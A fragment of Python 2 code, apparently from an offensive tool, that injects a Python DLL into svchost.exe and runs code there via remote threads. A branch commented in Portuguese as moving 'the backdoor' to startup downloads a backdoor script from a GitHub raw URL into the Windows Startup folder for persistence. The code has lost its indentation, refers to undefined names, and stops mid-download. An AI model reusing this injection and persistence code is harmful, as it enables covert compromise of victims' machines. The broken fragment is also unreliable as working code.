def alloc_string(pid, addr, value):
x = int(addr, 16)
process = Process(pid)
lpNewAddr = process.malloc(len(value) + 1)
newval = value + '\x0a'
print HexDump.hexadecimal(newval, '\\x')
try:
process.write(lpNewAddr, newval)
except Exception, e:
process.free(lpNewAddr)
raise
s.scan_processes()
pl = s.find_processes_by_filename("svchost.exe")
pid = pl[0][0].get_pid()
p = Process(pid)
print('pid', pid)
print('arch', p.get_bits())
t = p.inject_dll(python_dll)
p.scan_modules()
m = p.get_module_by_name(python_lib)
init = m.resolve("Py_InitializeEx")
pyrun = m.resolve("PyRun_SimpleString")
print(init, pyrun)
p.start_thread(init, 0)
time.sleep(0.1)
sh = 'import subprocess; subprocess.call("svchost.exe")'
addr = p.malloc(len(sh))
p.write(addr, sh)
p.start_thread(pyrun, addr)
# Movendo o backdoor pro startup
if dados.startswith("move_startup"):
url = "https://raw.githubusercontent.com/DedSec-F0x/DedSec-Framework/master/exploit/python/backdoortop.py"
user = getpass.getuser()
os.chdir("C:\Users\" + user + "AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\")
u = urllib2.urlopen(url)
f = open(file_name, 'wb')
meta = u.info()
file_size = int(meta.getheaders("Content-Length")[0])
print "Downloading: %s Bytes: %s" % (file_name, file_size)
file_size_dl = 0
block_sz = 8192
